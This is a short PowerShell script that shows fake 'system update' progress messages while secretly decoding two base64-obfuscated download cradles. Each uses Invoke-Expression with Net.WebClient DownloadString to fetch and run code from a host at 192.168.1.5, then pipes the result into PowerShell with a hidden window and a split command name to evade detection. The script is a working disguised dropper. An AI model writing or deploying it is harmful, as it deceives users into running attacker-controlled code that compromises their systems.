echo "[!] Preparing System for Update"
echo "[*] ============================"
start-sleep -s 1
echo "[*]"
start-sleep -s 1
echo "[*]"
start-sleep -s 1
echo "[*]"
echo "[!] Starting Update Process."
echo "[*] ============================"
start-sleep -s 1
echo "[*]"
start-sleep -s 1
echo "[*]"
start-sleep -s 1
echo "[*]"

$a1 = "SW5WT2tFLUVYcHJlU1NJT04gKE5ldy1PQkpFQ3QgTmVULldFYkNsaWVudCkuRG93bmxPYURTVHJp
bmcoJ2h0dHA6Ly8xOTIuMTY4LjEuNTo4ODg4L2ExJyk=" #InVOkE-EXpreSSION (New-OBJECt NeT.WEbClient).DownlOaDSTring('http://192.168.1.5:8080/a1')   
$r1 = "SW5WT2tFLUVYcHJlU1NJT04gKE5ldy1PQkpFQ3QgTmVULldFYkNsaWVudCkuRG93bmxPYURTVHJp
bmcoJ2h0dHA6Ly8xOTIuMTY4LjEuNTo4ODg4L3IxJykgIA==
"  #InVOkE-EXpreSSION (New-OBJECt NeT.WEbClient).DownlOaDSTring('http://192.168.1.5:8888/r1')  

start-sleep -s 1


echo "[*]"
start-sleep -s 1
echo "[!] Update Process Completed"
start-sleep -s 1

$update_a1 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a1))
$update_r1 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($r1))

echo $update_a1 | pow""ersh""ell -nop - ; echo $update_r1 | pow""e""rsh""ell -nop -windowstyle hidden -
